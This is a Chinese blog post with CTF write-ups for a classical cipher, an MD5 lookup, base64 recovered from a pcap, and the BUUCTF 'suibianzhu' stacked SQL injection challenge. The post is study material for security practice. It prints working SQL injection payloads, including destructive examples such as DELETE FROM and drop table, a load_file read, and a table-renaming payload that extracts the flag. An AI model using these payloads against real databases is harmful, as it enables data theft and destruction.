开学第八周刷题总结

最新推荐文章于 2022-02-13 14:17:35 发布
最新推荐文章于 2022-02-13 14:17:35 发布
阅读量393 收藏
点赞数
分类专栏: 笔记 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46172668/article/details/109407554
版权

Crypto

old-fashion 1
打开文本我们发现一串比较长的字符
Os drnuzearyuwn, y jtkjzoztzoes douwlr oj y ilzwex eq lsdexosa kn pwodw tsozj eq ufyoszlbz yrl rlufydlx pozw douwlrzlbz, ydderxosa ze y rlatfyr jnjzli; mjy gfbmw vla xy wbfnsy symmyew (mjy vrwm qrvvrf), hlbew rd symmyew, mebhsymw rd symmyew, vbomgeyw rd mjy lxrzy, lfk wr dremj. Mjy eyqybzye kyqbhjyew mjy myom xa hyedrevbfn lf bfzyewy wgxwmbmgmbrf. Wr mjy dsln bw f1_2jyf-k3_jg1-vb-vl_l
我们用词频分析,它是替换密码,我们就用文本爆破工具quipqiup试一下,网址https://quipqiup.com/
在这里插入图片描述
(那个clues也可以不输),然后我们看下面爆破的结果
在这里插入图片描述
在第一个,我们发现了flag,它后面的n1_2hen-d3_hu1-mi-ma_a就是我们的答案
MD5
看到题目我们就会想到它应该会用到md5加密,然后打开题目e00cf25ad42683b3df678c61f42c6bda
利用md5在线解密得到
在这里插入图片描述
然后我们提交即可

Misc

数据包中的线索 1
实现我们打开附件发现后缀是pcapng的,然后我们直接wireshark打开
在这里插入图片描述
然后我们搜索http的包
在这里插入图片描述
然后点击Analyze->Follow->HTTP Stream在这里插入图片描述
发现这个传输内容好像是base64密文,然后我们使用这个网站解码base64:https://the-x.cn/base64
在这里插入图片描述
发现它是一张图片,然后我们保存下来在这里插入图片描述
我们的答案就出来了

Web

[强网杯 2019]随便注1
首先我们打开题目网址
http://48577a73-b8d9-4186-9334-8f3e25585276.node3.buuoj.cn/
在这里插入图片描述

这道题主要利用堆叠注入
堆叠注入定义(摘录)
Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。
堆叠注入原理
在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语句为: Select *from products where productid=1;DELETE FROM products当执行查询后,第一条显示查询信息,第二条则将整个表进行删除。
(1)新建表
select *from users where id=1;create table test like users;
(2)删除上面新建的test表
select * from users where id=1;drop table test;
(3)查询数据
select * from users where id=1;select 1,2,3;
(4)加载文件
select * from users where id=1;select load_file(‘c:/tmpupbbn.php’);
(5) 修改数据
select * from users where id=1;insert into users(id,username,password) values (‘100’,‘new’,‘new’);
下面就让我们开始做题吧
1.我们利用1' or 1=1#语句,发现它可以把表中的所有数据都查出来,但是里面没有我们所需要的flag
在这里插入图片描述
2.我们看一下数据库名,利用i select 1,2,database()#语句在这里插入图片描述
发现很多函数都被过滤了,由于select被过滤了,那么union查询也就用不上了
3.我们就利用堆叠注入,输入0';show databases;#
在这里插入图片描述
果然可以,库名一下都查出来了
4.然后我们继续查表名,利用0';show tables;#语句
在这里插入图片描述

5.查看表结构,发现了flag在“1919810931114514”表里,输入0';desc1919810931114514;#这里的“1919810931114514”必须用反单引号,我刚开始用错了就一直界面错误,在windows系统下,反单引号
(`)是数据库,表,索引,列和别名用的引用符
在这里插入图片描述

6.再看一下words表的结构,0';desc words;#发现一共有id和data两列
在这里插入图片描述
7.那么查询语句很可能是:select id,data from words where id=
因为可以堆叠查询,这时候就想到了一个改名的方法,把words随便改成words1,然后把1919810931114514改成words,再把列名flag改成id,结合上面的1' or 1=1#爆出表所有内容就可以查flag啦
payload:

0’;rename table words to words1;rename table 1919810931114514 to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc words;#

在这里插入图片描述

8. 再用一下一开始的操作1' or 1=1#

在这里插入图片描述
我们的答案就出来了

yu jian
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2019全国大学生信息安全竞赛初赛writeup
a16511232的博客
05-05 4092
part_des 题目描述 Round n part_encode-> 0x92d915250119e12b Key map -> 0xe0be661032d5f0b676f82095e4d67623628fe6d376363183aed373a60167af537b46abc2af53d97485591f5bd94b944a3f49d94...
实验吧CTF密码学Writeup
凌云网络之昂chan的博客
08-11 4825
1、变异凯撒 对照ASCii码,差值递增a-f  f-l Z-a _-g 2、传统知识+古典密码 六十甲子表 辛卯,癸巳,丙戌,辛未,庚辰,癸酉,己卯,癸巳 28+60 30+60 23+60 8+60 17+60 10+60 16+60 30+60 88 90 83 68 77 70 76 90 X Z S D M F L Z 栅栏解密 XMZFSLDZ 凯撒解密 SHUANGYU 3、tr...
CTF Geek Challenge——第十一届极客大挑战Crypto Write Up
无限迭代中......
11-18 1127
比赛时间:2020年10月17日早上9点 比赛时限:一个月 参考文章
一款非常炫酷的MV全屏黑页,希望各位喜欢
03-26
这个MV黑页现在分享给各位,个人特别喜欢这个,如果各位不满意的话,可以回复我提些意见,谢谢
2020浦发极客算法拉力赛_2020极客大挑战部分wp
weixin_39582708的博客
12-22 406
pwn数学咋样payload# coding = utf-8from pwn import *import timei = remote("81.69.0.47", 1111)i.recvline()i.recvline()i.recvline()for ii in range(20):s1 = i.recvline()s = i.recvline()# print(s1,s)l = s.repl...
百日计划:第一,《七成为数据分析师》课程近万字总结
无小意的博客
03-12 9311
无小意 个人博客:无小意 知乎主页:无小意丶 公众号: 数据路(shuju_lu) 百日计划第一总结 1. 计划 1.彻底结束之前预定暑假完成的天善学院课程《七数据分析师》 2.总结《七数据分析师》。 2. 完成情况 1.完成《七成为数据分析师》任务 2.总结与《七数据分析师》一起完成。 《七数据分析师》总结 第一:数...
刷题记录1】算法|数据结构|C/C++
Sui_Chris的博客
02-13 499
开个楼记录刷过的题目,主要在用c写,偶尔用c++
[颓废史]蒟蒻的刷题记录
ws_fqk
01-05 3362
QAQ蒟蒻一枚,其实我就是来提供水题库的。 以下记录从2016年开始。1.1 1227: [SDOI2009]虔诚的墓主人 树状数组+离散化 3132: 上帝造题的七分钟 树状数组 二维区间加减+查询 3038: 上帝造题的七分钟2 线段树+剪枝1.2 1047: [HAOI2007]理想的正方形 二维单调队列维护最值1.4 2095: [Poi2010]Bridges 二分+混合图欧拉
OI每刷题记录——lrllrl
翻过这座山,他们就会听到你的故事
09-16 1703
看这标题就知道我是模仿的hzwer大佬,远程%%% 大佬的OI经历让蒟蒻我深受感触,为了晚一些AFO本蒟蒻也得加油了 从高二上期第一开始计数,每个星期天更一次,一直更到我AFO 2018.9.2~2018.9.8 线段树: CH4301 线段树 poj2482(同洛谷P1502) 线段树+离散化+扫描线 CH4302 线段树+最大公约数+树状数组+构造 poj2481 线...
每日总结
贝爷的奇遇冒险
07-12 2308
每日任务 初步任务 任务:PTA乙级题目 第一题1001 害死人不偿命的命(3n+1)猜想 第二题1003 我要通过 第三题1004 成绩排名 小结 初步了解java并开始学习java. 任务1: 其他两题大概了解了下。 第二题的思路 如果PAT正确,那么PAAT也正确;如果PAAT正确,那么PAAAT也正确;……以此类推。 如果APATA正确,那么APAATAA也正确;如果APAATAA正确,...
SQL注入总结
weixin_30477797的博客
08-18 190
SQL注入类型及检测注入 字符型注入 对于字符型注入,SQL语句如下 SELECT * FROM user_info WHERE id = '1'; 其实就是用户输入在引号内啦 就上面的定义来说,简单的检测方法就是用户输入带引号,以导致SQL语句结构不完整而报错或没有响应 True表示语句可用(正确显示内容或者操作有效) False表示语句不可用(Mysql报错...
爬取某学者主页上的文献
m0_38109459的博客
12-27 393
这爬取某学者主页上的文献 做研究经常与参考文献打交道,有时我们需要下载某个学者主页上的全部已发表文献,得到主页网址,点进去,一个接一个的下呗… 如果主页上的文章少,那么手动下载还可以。但有些大牛的主页上挂的文章数量动辄百十来篇,一个接一个下载太浪费感情了… 呜呼哀哉!之前大意了啊,当时没有想,现在,我爬一下就想起来了,很快啊,可以用爬虫啊! 下面我们就以”纪辉“这位学者的主页为例,说明如何爬取他主页上的文献。 文献所在的url是https://blog.nus.edu.sg/matjh/publicati
实验吧—密码学(1)
weixin_30367945的博客
11-20 268
密码学 一段奇怪的代码 哎!怎么出题的,都提示到家门口了 #@~^EQAAAA==VXlj4UmkaYAUmKN3bAYAAA==^#~@ 解:是JScript/VBscript 解题连接:https://dheart.net/decode/index.php 古典密码的安全性不高,但仍然十分美妙,请破译下面的密文 Os drnuzearyuwn, y jtkjzoztzoes...
记录最近做的一些web题目以及知识点(开个小坑到时候慢慢填)
Z745526156的博客
10-26 448
记录最近做的一些web题目以及知识点(开个小坑到时候慢慢填) GeekChallenge EZWWW 题目提示该题与文件备份有关,不知道咋搞先用dirsearch扫一扫 扫描语句 python dirsearch.py -u url -e * 从扫描结果可以发现存在一个www.zip 下载zip 解压后发现 flag.txt里面的是假flag 打开index.php <html> <head> <title>Lola's website1.0</t
java 取出int数组中的最大值及下标,取出集合中最大值 ,最小值
码点
11-07 1万+
package index; //取出int数组中的最大值及下标 import java.util.Arrays; import javax.naming.InitialContext; public class Test { public static void main(String[] args) { int[] arr = { 0, 45, 14, 85, 12, 14, 7, 25, ...
第十一届极客大挑战部分WP(无re和pwn)
volcano的博客
11-21 2292
1webWelcome(150) web Welcome(150) 进入网站后发现页面405报错 猜想是请求方法错误,于是用burpsuite抓包,改请求方法再
GeekChallenge2020
煤矿路口西的博客
03-21 1282
GeekChallenge2020 10.17 Web 朋友的学妹 view-source:查看网页源码 朋友的学妹 与妹子单独相处一会儿吧 网页了解到可以使用view-source:可以看到网页源代码,执行命令 view-source:<url> 得flag. EZwww 备份文件 EZwww 提示:备份是个“好????”习惯 提到备份文件,想起前不久刷过的GITHUB上的题,跑过去看了一眼,(Web-Web前置技能-信息泄露-备份文件下载),想起了当时的思路???? py
python 字符串转换为int类型的两种方法(面试题)
热门推荐
念念不忘,必有回响。
04-15 7万+
""" 怎样将"100"转换为100(2种方法) """ a = "100" #方法1: a = int(a) print(a) print(type(a)) #方法二 print(type(eval(a))) 一、python中字符串转换成数字 (方法1) 类中进行导入: import string str='555' num=string.atoi(str) num即为str...
Java中 2个整数类型(例如:int)相除,保留2位小数
LovKee
09-03 7338
两种方式都可以实现!  import java.math.BigDecimal; import java.text.DecimalFormat; import java.text.ParseException; import java.text.SimpleDateFormat; import java.util.Date; public class Test { public ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值